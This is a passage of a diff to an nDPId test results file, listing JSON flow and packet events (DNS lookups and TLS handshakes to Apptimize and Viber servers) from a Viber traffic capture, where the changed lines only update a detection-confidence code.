00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1527155639234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155639234,"pkt":"AA6OMNv9MAdNo1+nCABFAABAHWRAAEARm9jAqAARwKgAD\/WYADUALODJ\/WMBAAABAAAAAAAABG1hcGkJYXBwdGltaXplA2NvbQAAAQAB"} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1527155639237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1527155639237,"pkt":"MAdNo1+nAA6OMNv9CABFAAFnW5VAAEARXIDAqAAPwKgAEQA19ZgBU\/qk\/WOBgAABAAkABAABBG1hcGkJYXBwdGltaXplA2NvbQAAAQABwAwABQABAAAKmgACwBHAEQABAAEAAAA7AAQ2RabiwBEAAQABAAAAOwAENrtbtsARAAEAAQAAADsABCLf10HAEQABAAEAAAA7AAQjoIExwBEAAQABAAAAOwAEI6WM3sARAAEAAQAAADsABCOitm\/AEQABAAEAAAA7AAQ2RVffwBEAAQABAAAAOwAENrpW+MARAAIAAQAAA2AAGQducy0xODgzCWF3c2Rucy00MwJjbwJ1awDAEQACAAEAAANgABcHbnMtMTEyOQlhd3NkbnMtMTMDb3JnAMARAAIAAQAAA2AAFgZucy02ODUJYXdzZG5zLTIxA25ldADAEQACAAEAAANgABMGbnMtNDczCWF3c2Rucy01OcAbwSgAAQABAAADYAAEzfvB2Q=="} 
-00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1527155639237,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.166.226"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1527155639237,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.166.226"}} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639240,"flow_last_seen":1527155639240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155639240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1527155639240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8C6FAAEAGkTrAqAARNkWm4pB6Abv8W2quAAAAAKAC\/\/9PrwAAAgQFtAQCCAoAIWEPAAAAAAEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1527155639414,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639414,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHpPMSQJ\/Ftqr6ASaN+BOQAAAgQFtAQCCApMsKWZACFhDwEDAwg="} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1527155639417,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155639417,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0C6JAAEAGkUHAqAARNkWm4pB6Abv8W2qvTzEkCoAQAq0WDQAAAQEICgAhYTtMsKWZ"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} 
+00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
+01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155640085,"flow_last_seen":1527155640085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155640085,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1527155640085,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640085,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8sZJAAEAG60jAqAARNkWm4pB8Abt0c9BwAAAAAKAC\/\/9xAAAAAgQFtAQCCAoAIWHiAAAAAAEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1527155640261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640261,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHz0FjHkdHPQcaASaN\/u9gAAAgQFtAQCCApMsKZsACFh4gEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1527155640264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155640264,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0sZNAAEAG60\/AqAARNkWm4pB8Abt0c9Bx9BYx5YAQAq2DyQAAAQEICgAhYg9MsKZs"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00860{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155640085,"flow_last_seen":1527155640452,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155640452,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1527155641574,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1527155641574,"pkt":"AA6OMNv9MAdNo1+nCABFAABBH3ZAAEARmcXAqAARwKgAD5IqADUALZxVyU0BAAABAAAAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAQ=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"media.cdn.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1527155641691,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1527155641691,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXEZAAEARXIvAqAAPwKgAEQA1kioAlzNhyU2BgAABAAUAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAcAMAAUAAQAACsAAHg1kbzJneTJrd2FrOWsyCmNsb3VkZnJvbnQDbmV0AMAxAAEAAQAAADsABDbmXWDAMQABAAEAAAA7AAQ25l2mwDEAAQABAAAAOwAENuZdIsAxAAEAAQAAADsABDbmXaA="} 
-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155641691,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.96"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155641691,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.96"}} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641697,"flow_last_seen":1527155641697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641697,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1527155641697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641697,"pkt":"AA6OMNv9MAdNo1+nCABFAAA825FAAEAGCivAqAARNuZdYOCwAbu7GrjkAAAAAKAC\/\/84\/wAAAgQFtAQCCAoAIWN1AAAAAAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1527155641714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641714,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMbw25l1gwKgAEQG74LAWDyy+uxq45aAScSCWXAAAAgQFtAQCCAp+anA4ACFjdQEDAwg="} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1527155641716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641716,"pkt":"AA6OMNv9MAdNo1+nCABFAAA025JAAEAGCjLAqAARNuZdYOCwAbu7GrjlFg8sv4AQAq0zmAAAAQEICgAhY3p+anA4"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 